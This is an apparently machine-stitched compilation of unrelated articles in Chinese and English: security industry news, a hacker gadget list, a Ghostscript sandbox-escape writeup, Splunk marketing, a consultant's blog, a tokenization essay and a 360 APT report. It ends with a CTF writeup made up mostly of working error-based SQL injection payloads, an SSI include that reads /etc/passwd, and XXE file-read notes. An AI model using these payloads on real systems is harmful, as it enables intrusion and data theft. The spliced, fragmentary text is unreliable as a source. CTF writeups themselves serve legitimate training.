12 月 7 日，技术与供应链服务商英迈今日宣布与网络安全公司 Palo Alto Networks (派拓网络）达成分销协议，为其广大中国用户提供高商业价值的创新型解决方案。

英迈中国区首席执行官邵岩鸣表示：「英迈将凭借国际领先的分销管理经验和专业管理团队，向 Palo Alto Networks(派拓网络) 签约渠道和专业代理商提供更优质和广泛的解决方案。此次英迈与 Palo Alto Networks(派拓网络) 分销协议的达成，将进一步加速其在跨云端、网络和移动设备网络安全解决方案方面走向市场的步伐，为广大客户实现数字化转型提供安全保障。」

Palo Alto Networks (派拓网络) 大中华区副总裁陈文俊表示：「很高兴能够与英迈达成协议，与英迈的合作将进一步扩大 Palo Alto Networks(派拓网络) 包括新兴城市在内的全国渠道覆盖范围，并重点为公有云、私有云和物联网行业保驾护航。同时，我们也会凭借在网络安全领域的多年积累，不断培养和拓展高度发展的安全市场。」

本文我将为大家列举10个作为黑客的你最值得拥有的小工具。这些工具非常适合作为你无聊时的调剂品，或是作为生日圣诞礼物送给你的白帽朋友。当然，文中提及的某些项目可能并不适合所有的渗透测试人员。譬如无线爱好者可能会对下面的天线感兴趣，因为它能够通过无线方式捕获到击键，类似于WPA2握手包的抓取。而对四轴飞行器（Quadrotor）感兴趣的人可能会更关注无人机，因为它们能够在不丢失信号的情况下飞行1-2英里，并可携带Wi-Fi Pineapple和Raspberry Pi等附加硬件。

2016年，安全公司 Bastille Networks（巴士底狱） 安全研究员发现，大多数无线鼠标和接收器之间的通信信号是不加密的。允许攻击者在一百米范围内控制目标计算机而无需任何的物理访问，并将他们的设备匿名配对使用流行无线键盘适配器的目标计算机进行远程击键注入（如下所示）。

由于键盘供应商（Logitech和Dell）未对键盘和USB适配器之间的传输数据加密或未正确验证与适配器通信的设备，因此导致了该攻击的发生。漏洞披露虽然已有两年多的时间，但据报道全球受此影响的设备超过10亿，因此漏洞带来的影响将很难在短时间内被消除。

有关此攻击的更多信息，请访问Bastille官方网站，获取 受影响设备列表 和 技术细节 。

这些攻击中使用的“ Crazyradio USB Dongle ”是一个2.4 GHz的双向收发器，可以发送和接收无线电遥测。从本质上讲，这个USB Dongle可用于观察，记录以及无线电波的注入。

图形处理器（GPU） 通常嵌入连接到计算机主板的内部显卡中，用于高效处理图像游戏内存等问题。可以说GPU负责我们电子设备上的所有视频和图像渲染。

黑客则可以利用GPU技术 构建自己专属的密码破解设备 ，这将大大缩短爆破的时间以及提升爆破的成功率。Tokyoneon在他的帖子“ Hack 200 Online User Accounts in Less Than 2 Hours ”中充分证明了该方案的可用性。他通过GPU成功破解了 泄露密码数据库 中的哈希，并接管了数百个Twitter，Facebook和Reddit用户帐户。

对于正在考虑使用GPU来破解密码的你来说，我强烈推荐 GeForce显卡（GeForce GTX 1050 Ti） 。这款显卡的售价仅为189美元，是一款出色的入门级GPU。

当然，如果你想要你的密码破解设备更为高效和强大，你可以选择购买 GTX 1080 Ti 或是 RTX 2080 Ti （吊丝表示还是当个吃瓜群众~）。

GPD Pocket 被称为“世界上最小的笔记本电脑”，它采用Intel Atom X7, 1920 x 1080分辨率和8 GB RAM，装在一台小型笔记本电脑中，只比大多数现代智能手机大一点儿（如下图所示）。

由于其体积小，拥有物理键盘，处理高性能游戏的能力以及优于 Raspberry Pis 和 智能手机 的英特尔CPU，而受到越来越多人的青睐。

渗透测试人员可以在此设备上轻松 安装各种linux操作系统 ，包括Ubuntu，Kali Linux和BlackArch，而不是默认的windows 10。

如果你想要更薄功能更为完善的GPD Pocket，你可以入手最新推出的 GPD Pocket 2 。相比GPD Pocket它的厚度至少减少了一半。

今年刚推出的Raspberry Pi 3 Model B+，具有更快的CPU，以及升级的Wi-Fi和Ethernet模块，并且可以使用Ethernet端口（ PoE HAT ）在没有传统电源适配器的情况下供电。

关于 使用Raspberry Pi构建黑客专用便携式设备 的帖子在之前已发过很多，因此这里就不再详细进行介绍了。

今天给大家分析的是一种新型的 ghostscript-dSAFER沙盒逃逸技术 ，目前这项技术仍然适用于当前正在使用的所有ghostscript版本。我不知道这个漏洞存在多久了，反正我是觉得已经很久了…

本文提供的漏洞利用代码可以在最新的几个版本中正常运行，如果你想在evince、imagemagick、gimp或okular中查看代码的话，你还需要在~/.bashrc那里添加一行。因为nautilus将在没有任何用户交互的情况下自动调用evice-thumbnailer。如果你想触发这个漏洞的话，你只需要在运行了漏洞利用代码之后随便浏览一个网站就可以了。

echopwned by postscript

Postscript的一个核心访问控制功能就是它能够标记可执行代码的运行过程，这样可以防止用户窥视系统程序的执行，并获取更强大的访问操作权限。为此，我专门设计了一个完整的漏洞利用代码，感兴趣的同学可以自行下载测试【 下载地址 】。

当你在 errordict 中安装了错误处理器之后，如果你终止了一个正在执行的操作进程，这样便会将错误操作符暴露给错误处理器。此时，，rrorerdict便会忽略-dSAFER沙箱，这也就是本文所利用的漏洞 CVE-2018-17183 。

需要注意的是，这个漏洞目前还没有被完全修复，因为你现在仍然可以调用错误处理器，并触发错误，或者访问内部状态所保存的错误处理器。

其中一种漏洞利用方法为，找到能够终止运行的执行进程，触发一次异常，然后调用错误处理器并终止它的运行（可以通过/stackoverflow或/execoverflow来实现）。当出现故障时，操作码堆栈将会处于一种不一致的状态，因为ghostscript会尝试设置错误处理器，但这种设置是无效的。

首先，用垃圾数据填充堆栈，只给错误处理器留下一小部分空间：

然后通过修改pdfopdict（改为非字典形式）来让/switch_to_normal_marking_ops发生错误：

调用/switch_to_normal_marking_ops（当前正在执行状态中）：

操作会失败，因为/typecheck正在写入pdfopdict：

查看已保存堆栈中的最后几个元素：

大家可以看到，错误的操作符已经准备传递给错误处理器了。

其中，forceput是一个非常强大的操作符，它可以忽略所有的访问控制，我们可以把它从堆栈中提取出来，然后用它来做我们想做的事情：

结合之前所介绍的内容，我们看一看如何去读取/etc/passwd中的数据，下面给出的是一份DEMO：

下载地址：【 点我下载 】

* 参考来源： mailclark ，FB小编Alpha_h4ck编译，转载请注明来自CodeSec.Net

aes是对称加密算法，这篇博客只介绍怎么使用golang中怎么调用标准库已封装的算法实现，如果是要学习aes算法实现，移步百度

有两个操作：加密和解密

const BlockSize = 16

功能说明：AES算法块（加密数据块）的字节长度。

2018年11月，由公安部第一研究所指导，嘶吼传媒主办的“金帽子”奖年度评选活动正式上线。活动上线后，众多企业和组织纷纷踊跃报名。随着时间的推移，该评选活动也进入到了评选投票阶段。在此，嘶吼再次向大家介绍正在参与评选本届“金帽子奖”的朋友们，今天为大家展示的是年度杰出安全实验室。

知道创宇404实验室：知道创宇404实验室是知道创宇神秘而核心的安全研究团队，长期致力于Web、IoT、工控、区块链、云安全、移动安全等领域内安全漏洞挖掘、攻防技术的研究工作，在业内享有非常高的声誉，404实验室是最早具备全球漏洞风险感知的团队，并对全球重大安全事件、高危漏洞跟踪研究并输出安全能力，曾多次向国内外多家知名厂商如微软、苹果、Adobe、腾讯、阿里、百度等提交大量安全漏洞研究成果，并协助修复安全漏洞，多次获得相关致谢， 为提升业界安全水平作出了重要贡献。404实验室主导的KCon黑客大会、Sebug 漏洞社区、ZoomEye 网络空间搜索引擎，简称“KSZ”，是知道创宇安全产品及服务能力的最有力保障，也是技术实力长期保持在国际顶尖水平的秘诀。

火绒安全实验室：火绒安全成立于2011年，长期专注于终端安全领域，潜心研发引擎等底层技术，秉承“情报驱动安全”理念，率先构建完成EDR（终端、检测和响应）运营体系，逐渐领跑终端安全领域。火绒实验室主要由反病毒部门人员构成，除产品外，研究成果均以报告形式展现。实验室已对外公布数百篇专业报告，解读各类恶性病毒、流氓软件；揭露黑客团伙、流量黑产；报告均强调事件的本质和真实性，对数据和证据的截取严格把关，对病毒的分析力求精准无误。曾成功帮助百度及腾讯QQ发现并处理旗下产品的相关问题。

深信服千里目安全实验室：千里目，取自王之涣《登鹳雀楼》“欲穷千里目，更上一层楼”；又有荀子《劝学》“到此岂可千里目，哪知才上一层楼”。寓意均为站得高才能看得远，学无止境，勇攀高峰。在网络安全攻防技术研究领域只有不断地努力钻研，才能不断提高专业技术造诣，进而抵御更多的未知网络安全威胁。我们更希望做网络空间的一双眼睛，拥有更加敏锐长远的眼光（Further eye），深度洞察未知网络安全威胁，解读前沿安全技术。

蚂蚁金服光年安全实验室：蚂蚁金服光年安全实验室组建于2016年底(原巴斯光年安全实验室)，由多位资深安全专家组成的金融支付安全领域实验室，有着丰富的黑灰产抗击经验和行业内顶尖的攻防技术能力。除致力于护航蚂蚁金服相关产品安全，同时也通过前沿的安全技术的分享来赋能外部合作商户/厂商以及生态伙伴的安全。目前核心安全能力领域包括移动端浏览器的漏洞挖掘与利用、移动操作系统漏洞攻防研究、移动端应用供应链体系的漏洞攻防研究、生物识别安全以及IoT安全等。近一年来，实验室在在国内外多个重量级安全舞台上先后发布了具有行业影响力的安全研究成果，也获得了 Google、Apple 以及三星等多个厂商的致谢。

未来安全胖猴实验室：胖猴实验室(PwnMonkey Security Lab)专注于互联网和物联网的前沿安全攻防技术研究，拥有业界优秀的安全分析团队，核心成员均有多年从事安全研究的经验。在其相关的研究领域中，该实验室数次发现重大安全隐患并整理成安全风险报告提供给有关的企业和部门，及时阻止潜在安全问题的出现。

360天马&天巡联合实验室：360天马&天巡联合实验室是360负责无线安全研究的安全团队，主要负责无线局域网攻防技术的探索与研究，为无线局域网安全提供富有创新性和实用性的攻防技术，同时为各种应用场景提供完整的无线安全解决方案。自实验室成立以来共获得发明专利6项、外观专利3项，在大数据分析、无线威胁检测、无线攻防等方面积累大量经验，众多安全研究成果入选了BlackHat USA/Europe、DEFCON、HITB、CodeBlue、KCon等国内外知名安全会议，并与公安三所合作建立国内首个针对Wi-Fi安全的技术标准。实验室基于在无线领域的攻防能力与企业网络防御经验，打造了国内首个独立式无线入侵防御系统-天巡。4年里服务了超过300家各领域客户，为客户提供先进的无线安全解决方案，打造国内无线安全产品第一品牌。

腾讯安全科恩实验室：腾讯科恩实验室作为腾讯集团旗下一支国际一流的信息安全团队，在桌面端安全、移动终端安全等研究领域有十多年的积累，技术实力和研究成果达到了国际领先水平；近几年来，更是在智能网联汽车信息安全、IoT 安全、云计算和虚拟化技术安全等领域取得丰硕的成果。随着更多ICT新技术进入大众视野，腾讯科恩实验室也积极布局人工智能算法和技术框架的安全研究、机器学习在信息安全研究领域的应用研究和区块链技术应用的安全研究等新纬度上的前沿技术研究能力。同时开放自身核心技术能力，并固化为云端智能检测SaaS服务，提供给智能网联汽车、安卓应用生态、IoT等行业，并根据产业实际痛点和研究推出了智能网联汽车信息安全行业解决方案。护航各行业数字化变革，守护全网用户的信息安全是腾讯科恩实验室的使命。

360Vulcan Team：360Vulcan Team核心技术人员均为全球领先的顶级资深信息安全专家，团队研究方向为漏洞挖掘与利用。在主流浏览器、主流操作系统内核、常用软件、虚拟化软件、区块链软件的漏洞挖掘利用等多个领域有深入的积累和成果。团队在微软、谷歌、苹果、Adobe、VMWare等厂商的产品中累计发现数百个高位漏洞，并获得厂商的公开致谢。团队多名成员连续多年入选微软MSRC TOP 100安全研究者榜单，并且团队成员在2017/2018年连续两年成为该榜单中排名最高的华人安全研究员。团队多次参加国内外知名黑客破解大赛并取得优异成绩。在Pwn2Own 2015/2016/2017，Mobile Pwn2Own 2017，PwnFest 2016中成功破解IE、Edge、Chrome、Safari、Adobe Reader、Adobe Flash、iPhone、Mac OS X、Window 10、VMware Workation等项目，并在Pwn2Own 2017大赛中获得Master of Pwn称号。在2018年5月，团队在市值百亿的区块链平台EOS中发现了史诗级安全漏洞并报告给厂商修复，该漏洞可以直接实现远程代码执行从而控制整个EOS网络。在刚刚结束的天府杯网络安全破解大赛中，团队成功破解了Edge、Chrome、Adobe Reader、VMWare Workstation、Virtual Box、Apple Safari、iPhone X远程越狱、Office 365等项目，获得团队和个人双料冠军。

凌天实验室：凌天安全实验室，是安百科技旗下针对应用安全领域进行攻防研究的专业技术团队，其核心成员来自原乌云创始团队及社区知名白帽子，团队专业性强、技术层次高且富有实战经验。实验室成立于2016年，发展至今团队成员已达35人，在应用安全领域深耕不辍，向网络安全行业顶尖水平攻防技术团队的方向夯实迈进。

安恒海特实验室：安恒信息海特实验室隶属于杭州安恒信息技术股份有限公司安全研究院，是一支专注于物联网安全研究的团队。海特实验室(HatLab)，寓意为“Hack AnyThing”，研究领域包含智能家居安全、车联网安全、智慧医疗安全、工业互联网安全等。在成立至今，已先后发现多款国内外著名品牌汽车、多款国内外著名摄像头、多款国内外著名品牌的路由器、多个著名品牌的智能网关、多款国内外知名智能门锁的严重安全漏洞等并协助厂商修复，为营造健康、安全的物联网环境作出重要的贡献。

目前，“金帽子”奖各奖项评选已开始，12月30日前将在官网公示获奖结果，2019年1月份将举办现场颁奖盛典，为所有获奖者及公司颁发荣誉奖杯。

注：以上排名均不分先后

The following is a guest blog post from Chris Decker, Enterprise Security Manager at Penn State University .

Consider information security at an organization that has 17,000 employees, 100,000 inhabitants, an airport, a power plant and a police force. You might think we're talking about protecting assets for a mid-size city or large corporation―that'd be a good guess. A large university; well, that might surprise a few people.

Large universities present their own unique information security challenges. In some ways, their size and scope are like a mid-size city; in other ways, they are even more complex. Universities have large, legacy administrative systems, cutting edge research, intellectual property and lots of sensitive data. In other words, they have valuable information assets. Now consider the fast, open networks, a diverse user base and decentralized IT support―along with the expectation of autonomy to support free-thinking. It can be easy to imagine the risks.

Higher education resources are often limited and we have to work to make the most of available resources. A growing challenge inhigher education information security is staffing a SOC with qualified, experienced personnel. Penn State is no different. In contrast, there seems to be an unlimited supply of adversaries operating in a 24x7 fashion. This creates significant workloads that can burn out or even overwhelm our analyst. It quickly became evident that we needed to turn to automation to supplement our analysts.

In the past, each analyst used their work experience to “duct tape” together a variety of python, Perl and bash scripts, but that was very time consuming as systems and APIs changed and quickly became difficult to maintain. It also was a huge barrier for less experienced personnel who had no scripting or programming background. Finally, while we have “plays,” occasionally a step would be overlooked or forgotten.

Earlier this year we purchased theSplunk Phantomplatform to help address these problems.

The first challenge we threw at Phantom was to automate our Tier-1 phishing workflows. We receive more than 50 phishing reports daily, many of which are duplicates. A team of analysts pours through the submissions, takes appropriate action and then provides a tailored response to the submitter. This process is tedious, time consuming and frankly it ties up analysts whose time is better spent elsewhere.

With Phantom, this workflow is now automated. Previously-known threats are automatically triaged and a tailored response is sent back to the submitter with no human interaction required. All other submissions are sent to Phantom Playbooks to enrich the data so an analyst has all of the necessary information at their fingertips:

If a response is necessary, Phantom runs a series of remediation playbooks to interact with our various security appliances, using the Phantom-provided “apps.” This saves us from having to learn the various APIs and ensures consistency. Phantom also has a tight integration withSplunk Enterprise, allowing us to feed the results back to Splunk so we can use the power of SPL to aid in future detection efforts. The end result is then added back to Phantom so that related submissions are automatically triaged in the future.

Although it's early, Phantom is already freeing up analysts to work on tasks that a computer is not (yet) good at solving. If you find that your organization is also struggling to keep up, consider an automation platform. Phantom is the right tool for our needs.

Catch Chris talk more about his automation journey on the webcast, " A Tale of Two SOCs: Regaining Control Using Automation ."

SECURITY

Share:

Gartner recently published the 2018 Magic Quadrant for Security Information and Event Management (SIEM) and Splunk was named a Leader for the sixth straight year. In the report, Gartner placed Splunk in the Leaders quadrant with the highest overall position in “Ability To Execute”.

We are honored by this recognition, which reflects ourcustomers’ successes, our continued investments in innovative solutions that solvesecurity monitoring andthreat detection use cases identified in the Magic Quadrant.

Oursecurity portfolio helps customers to realize their Nerve Center and address a wide range of security monitoring and threat detection use cases. Customers use Splunk Enterprise Security and Splunk User Behavior Analytics together as an Analytics-Driven SIEM to build their Security Operations Centers to detect, investigate and respond to threats.Splunk Phantom, the leading security orchestration, automation (SOAR) and response solution helps customers to investigate and accelerate their response to incidents.

Splunk and partner apps, playbooks and analytic stories extend and simplify deployments by providing pre-packaged, ready to deploy content designed for specific use cases and data types.

Register for a complimentary copy of the 2018 Gartner Magic Quadrant for SIEM today!

Are you in a hurry to get started with your first SIEM or migrate away from your legacy SIEM?LearnhowFINRAandREIuse Splunk.

Contact us to find out how you can benefit from Splunk Security Solutions.

Girish Bhat

Splunk

Disclaimer: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Attribution: Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 3 December 2018

Posted by

Girish Bhat

Girish Bhat is the director of security product marketing at Splunk with responsibility for key security solutions, the Splunk CISO customer advisory board and customer use cases.

Previously, Girish held various roles managing authentication, compliance, VPN, advanced threats, DLP, IDS/IPS, mobile, SaaS, IaaS, virtualization and network monitoring solutions.

With more than 15 years of experience with startups and global brands, Girish’s experience includes product marketing, business strategy, strategic analysis, solutions marketing, product management for security, mobile, networking, cloud and software products.

It’s been an interesting week here at gethynellis.com . We have been busy with a SQL Server version upgrade for a customer, the new solution combining Always On Availability Groups and merge replication. We have also been helping a customer with some on premises SQL Server builds, creating a new pre-production environment. Fun times - its good to know on premises is still a thing . It’s the news this week that has been most interesting.

Thursday this week was an unusual and difficult day for users of the O2 phone network. It seems that in the early hours of Thursday morning something fundamental in the O2 network broke. Meaning that some 25 million people (I have seen this quoted as being as high as 30 million, which include other suppliers who utilise the O2 infrastructure.) had no access to data on their phones. How did people cope? It’s back up and running as of Friday morning, Software and a third party suppliers are being blamed along with an expired certificate.

I did find this tweet particularly funny

If it did nothing else, the O2 outage further highlighted how dependent people have become on using their smart phones and having internet access in particular. O2 have mentioned compensating customers for the outage, I haven’t seen any details on how that will work but it will be interesting to see how that materialises.

Affecting Starwood hotels... The following is an extract from an email I have received from Marriott telling me about a Starwood hotels data breach. I have stayed in Marriott hotels on many occasions. I don't recall staying in a Starwood hotel however the fact I'm getting this email must mean my details are in their databases... Worrying!

"On September 8, 2018 an alert was received from an internal security tool regarding an attempt to access the guest reservation database...Security experts were engaged to help determine what occurred. We learned during the investigation that there had been unauthorized access to the Starwood network since 2014. Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database and determined that the contents were from the Starwood guest reservation database.

The information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest ("SPG") account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken. For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information."

So someone has been rumbling around in this database for four years without anybody noticing, with access to a plethora of data including in some cases credit card information ... Oh dear! I suspect this will not be last the last we hear of this.

You can't round up this week without mentioning Brexit. Let’s not talk about politics for too long or we’ll all get depressed, but it’s been an interesting and possibly a slightly worrying week as Teresa May attempts to sell "The Deal" to MPs. ( It doesn't feel like a great deal to me ).

Every day in parliament this week has been the most important day in parliament’s history since... well the previous day. There is no doubt a long way to go before we get anywhere near a solution to the Brexit problem. Although if the "meaningful vote" is defeated on Tuesday next week, assuming the vote happens and is not delayed we might heading for a new Prime Minister or even another general election all before Christmas.

Interesting Times...I wonder what fun next week will bring.

Júlio Santos

Our economy has evolved to consider and account for a variety of different assets: stocks, bonds, real estate, commodities, intellectual property, and many others. Trading some of these assets is constrained by their physicality, as it may be cumbersome to physically trade ownership, or even to subdivide the asset.

In order to help address this issue, we invented securitization. That’s the process of transforming ownership of an asset or a right into an easily tradable security. We predict that, with the emergence and maturity of blockchain technology, and the development of open standards, we will be enabled to expand on the concept and impact of securitization. We will do this through the tokenization of assets.

The digitization and standardization of securities trading has a long history already, but many of these systems remain walled gardens with no interoperability. They’re not open systems in which anyone, even with the right requirements, can participate at will. And they’re heavily intermediated by parties whose roles (providing trust and mitigating risk) could be made obsolete with the trustlessness, transparency and decentralized consensus of a blockchain system.

Now that we have the technological means to achieve it, tokenizing relatively illiquid assets and creating a market in which to trade these tokens is inevitable. Traditional, relatively illiquid assets stand to gain a substantial liquidity premium which, together with the slashing of fees due to disintermediation, represents an enormous market opportunity.

Tokenized securities are disruptive to modern financial markets because of their disintermediation potential, global exposure, and programmatic operation. A few advantages of security tokens are:

All these combined should lead to a greater market efficiency, and the programmatic nature of these tokens will open the floodgates for new financial technology. Building a standardized protocol on top of which quants and other developers can dream up new financial products and services is paramount, as it truly enables innovation to accelerate in the space. Critically, this innovation would be permissionless, as it wouldn’t be limited to the R&D departments of the current large players in the financial space.

Standardization and interoperability are two crucial concepts in the movement for the opening up of financial markets.

Over the years the financial world has developed some standards, and it’s not a new idea. It would otherwise be impossible for your broker to hold shares in different companies using the same legal structure. Tokenization, however, enables us to take this concept to new heights by standardizing ownership in many different asset classes and making it possible for them to be held in the same wallet, used as collateral for loans, and straight up trading without the need for cash intermediation. I envision all asset classes to merge into a global pool of liquidity, interoperable through a common API.

A great advantage of security tokenization is the potential for automated compliance. We’re experimenting with a token with embedded compliance: a compliance-native token if you will. This prevents the tokenized security from falling into the wrong hands, while maintaining disintermediation at the trading stage.

It’s easy to conceive of a nave version of this technology. For those familiar with the ERC-20 standard, you can picture expanding on that contract with a restriction so that ownership transfers can only happen for addresses which have been registered as having undergone the proper level of financial due diligence (KYC/AML/CFT, capital markets regulations, investor accreditation).

These security tokens, with embedded compliance, should make the compliance process so seamless and auditable that I predict regulators will start demanding the tokenization of securities for these advantages alone. The enforcement of regulations will be that much simpler in this world. There’s good reason to believe this will happen, as we’ve seen regulators demanding technology adoption in the past .

Regulation will, inevitably, have to evolve. Some countries regulate the form under which some ownership transfer has to take place, or demand a physical paper trail. We believe that competitive pressures brought about by pioneer local financial markets will push other regulators to embrace this new technology.

Picture, as described above, a token instantiation contract which requires buyers to have undergone some level of KYC. The buyer would have to submit themselves to a thorough registration by an identity provider, such as Fractal ID . Upon successful verification, Fractal ID could provide them with a cryptographically signed claim of such KYC verification, which they can use as an attestation for the token contract to prove their eligibility to buy. At that point, the contract will allow a sale, by allowing ownership in the tokens to be attributed to this buyer.

An interesting possibility of the mechanism devised above is that the token contract doesn’t need to know the identity of the buyer, only that they underwent a required level of KYC, provided the contract trusts Fractal’s claims.

This is an example of what a smart contract / application network could look like.

The example above provides the following functionality:

As an example, let’s assume a loan marketplace to which an investor has provided liquidity, to be provisioned for loans that meet certain acceptance criteria. For example, the loan must be collateralized by tokenized assets, insured by a third party, and only granted to individuals with a certain credit score. At this point, an individual can use their registered Cryptokitties, which are dynamically priced, as collateral for said automated loan. This loan is then managed by the escrow contract, which holds custody of the collateral and the provisioned liquidity. The user would make regular interest payments on the loan to this contract, which are passed on to the investor.

曾经一奶同胞的铁哥们儿，如今却反目成仇！

俄罗斯和乌克兰都曾经是苏联的加盟国，自打2014年发生克里米亚危机后，这原本“哥俩好”的两国关系迅速降至冰点，双方曾一度剑拔弩张。

这不，直到现在这俩倒霉兄弟也没消停着――11月25日，乌克兰海军三艘军舰穿越俄罗斯边境向刻赤海峡航行。对峙期间，俄罗斯船只向乌克兰军舰开火并将其扣押，这正是轰动一时的“刻赤海峡”事件。

事发后，就在大家以为在国际压力下，两国将进行协商而平息矛盾的时候，乌克兰国却突然宣布进入全面战备状态。死对头亮剑，俄罗斯哪能甘拜下风？随后，俄罗斯便在克里米亚半岛部署了第4个S-400“凯旋”防空导弹营，两国之战一触即发。

更有媒体猜测，此次事件似乎是乌克兰现任总理波罗申科为赢得新一届总统选举有意为之：为了让事件第一次就能炸雷，波罗申科愣是在G20峰会前几天自造“刻赤海峡事件”，使得美国总统特朗普被迫取消了原定在峰会上与普京的会晤。

美国：作，继续作，俩倒霉玩意儿~

然而......还没完！12月4日，雷锋网获悉360高级威胁应对团队于11月29日在全球范围第一时间发现了一起针对俄罗斯的APT攻击行动。值得注意的是，此次攻击相关样本来源于乌克兰，攻击目标则直指俄罗斯联邦总统事务管理局。

又作？接到消息后，八卦的雷锋网 (公众号：雷锋网) 赶紧找到好朋友360集团助理总裁郑文彬聊了聊，对此次APT攻击事件的来龙去脉做了个全面了解。

此次APT（高级持续性威胁）攻击被360称作“毒针”行动，行动以一份使用了最新Flash 0day漏洞cve-2018-15982和带有自毁功能专属木马程序的俄文内容员工问卷文档为开端，攻击过程主要分为三个阶段：

1>攻击者通过投递rar压缩包发起攻击，打开压缩包内的诱饵文档就会中招；

2>当受害者打开员工问卷文档后，将会播放Flash 0day文件；

播放Flash 0day漏洞

3>触发漏洞后，winrar解压程序将会操作压缩包内文件，执行最终的PE荷载backup.exe；

漏洞执行进程树

不过，这Flash 0day漏洞究竟有何神通竟被选中对具备极高敏感度的俄罗斯联邦总统事务管理局展开攻击？

原来，此次的CVE-2018-15982 0day漏洞是flash包com.adobe.tvsdk.mediacore.metadata中的一个UAF漏洞。利用代码借助该漏洞，可以实现任意代码执行。从最终荷载分析发现， PE荷载是一个经过VMP强加密的后门程序。解密后发现，主程序主要功能为创建一个窗口消息循环，有8个主要功能线程，其中包括定时自毁线程。

也就是说，这玩意儿它带“自毁”功能。

郑文彬告诉雷锋网，此次攻击木马的定时自毁线程可以在完成攻击任务之后将电脑中存留的木马病毒、日志以及存留的痕迹全部销毁。实际上，360安全大脑发现漏洞的过程就像在做拼图游戏，最终目的正是将极度碎片化的样本通过反推来逐渐还原。”

由此来看，由于攻击本身具备自毁属性，此次360安全大脑在发现漏洞的过程中其操作难度自然也会增加不少。

11月29日下午，360安全大脑所属QEX团队和高级威胁沙箱团队分别通过应对高级威胁的探针技术，云端沙箱首次探测到Flash 0Day漏洞。随后，追日团队对该样本漏洞进行了分析溯源并还原了攻击全貌，最终将其确定为一起针对俄罗斯的APT攻击行动。

漏洞文档内容

据郑文彬分析，利用UAF漏洞，攻击者通过强制GC获得一个垂悬指针进行多次UAF实现任意地址读写绕过ASLR，最后借助HackingTeam泄露代码中的方式绕过DEP/CFG，执行shellcode。

也就是说，此次发起APT攻击的攻击者很可能是个“惯犯”，而上一次遭殃的正是这家名为HackingTeam的意大利军火商。

作为为数不多的几家向全世界执法机构出售监控工具的公司之一，Hacking Team帮助政府针对新闻记者、激进分子、政府中的反对派以及其他对政府可能造成的威胁因素进行入侵和监控。

2015年7月，该公司遭黑客攻击，旗下大量网络武器和攻击工具泄露，黑客利用其flash漏洞进行大规模挂马传播，总传播量上百万，对整个互联网安全构成严重威胁。

Hacking Team被攻击 大量信息遭泄露

郑文彬告诉雷锋网，此类攻击的目标很少，一般集中在国家机构，但引起的危害就如同蝴蝶效应一般，会引发巨大风暴。

举个例子，2015年圣诞节期间，乌克兰国家电力部门遭受了APT攻击，乌克兰西部140万名居民在严冬遭遇大规模停电事故，城市陷入一片恐慌。

可见，跨国APT攻击事件若没有被及时发现并制止，其后果不堪设想。

那么，此次APT攻击事件的背后，攻击者的目的又是什么呢？

据该机构的官网信息显示，被攻击机构所属俄罗斯联邦总统事务管理局，是专门为俄罗斯联邦最高行政、立法、司法当局的工作人员、科学家和艺术家提供服务的专业医疗机构。

虽然目前还无法确定攻击者的动机和身份，但考虑到该医疗机构的特殊背景和服务的敏感人群，这也使此次攻击表现出了一些定向性。

该医院机构介绍

值得庆幸的是，攻击事件发生后，360第一时间将0day漏洞的细节报告了Adobe官方。12月5日，Adobe官方加急发布了Flash 32.0.0.101版本修复了此次的0day漏洞并致谢360团队。

发现漏洞后，360选择最先在微博上公开此次监测的详细过程。截止今日，已经有大批网友留言评论，其内容可谓是脑洞大开。

而采访过程中，雷锋网也从中挑选出两条问题来询问了郑文彬：

微博昵称为@钢冰水火的网友：“忙也帮了，Adobe 就不考虑给点儿奖励吗？”

郑文彬：我觉得这是分两面的，首先360自己会发现很多漏洞去反馈给厂商，各别厂商会设立相应奖励计划；另外，如果漏洞已被黑客利用，这种情况属于0Day漏洞已被攻击，危险等级也会提高，一经发现厂商将更加重视；

微博昵称为@不返之六号归复者：“美国的两线进攻？我猜老美背后操刀的可能性有85%。”

郑文彬：对于没有数据支撑的个人推测是不可信的，360完全通过现有样本来分析相关证据，进而确定此次APT攻击事件的指向，目前尚不能确定具体的攻击者身份或者攻击者的明确意图。

实际上，漏洞被发现并曝光之后不光对厂商起到了预警效果，同时也会使得攻击计划暂时搁浅或者不再执行，这也为阻止APT攻击事件持续发酵起到了积极作用。

“以人工智能技术为支撑，360安全大脑已经实现在百亿级样本中追踪高级威胁攻击，这将为复杂的网络系统铸造一堵攻不破的“防火墙”。”

你认为此次APT攻击是否与“刻赤海峡”事件有着必然联系呢？对于此次APT攻击行动你又有怎样的独到见解呢？快在文末留言分享给大家吧！

雷锋网原创文章，未经授权禁止转载。详情见 转载须知 。

随手登录一下

发现报错，于是尝试

admin' and (extractvalue(1,concat(0x7e,database())))#

admin' and (extractvalue(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()))))#

admin' and (extractvalue(1,concat(0x7e,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='flag'))))#

admin' and (extractvalue(1,concat(0x7e,(select flag from flag limit 0,1))))#

'~EIS{7879f0a27d8bcfcff0bcc837d76'

admin' and (extractvalue(1,concat(0x7e,(select substr(flag,30,60) from flag limit 0,1))))#

~7641e81}

最后flag

EIS{7879f0a27d8bcfcff0bcc837d7641e81}

题目提示

SimpleServerInjection, SSI, flag in current directory

随即搜索SSI

https://blog.csdn.net/wutianxu123/article/details/82724637

结果这个文章第一个就是payload。。。

<!--#include virtual="/etc/passwd" -->

于是测试

http://210.32.4.22/index.php?name=<!--#include virtual="flag" -->

EIS{59f2c02f18838b3fb57dd57e2808f9c2}

题目提示XXE，直接xxe是不行的

所以需要改type

然后即可xxe读文件，得到flag

直接可以进行列目录

然后得到flag

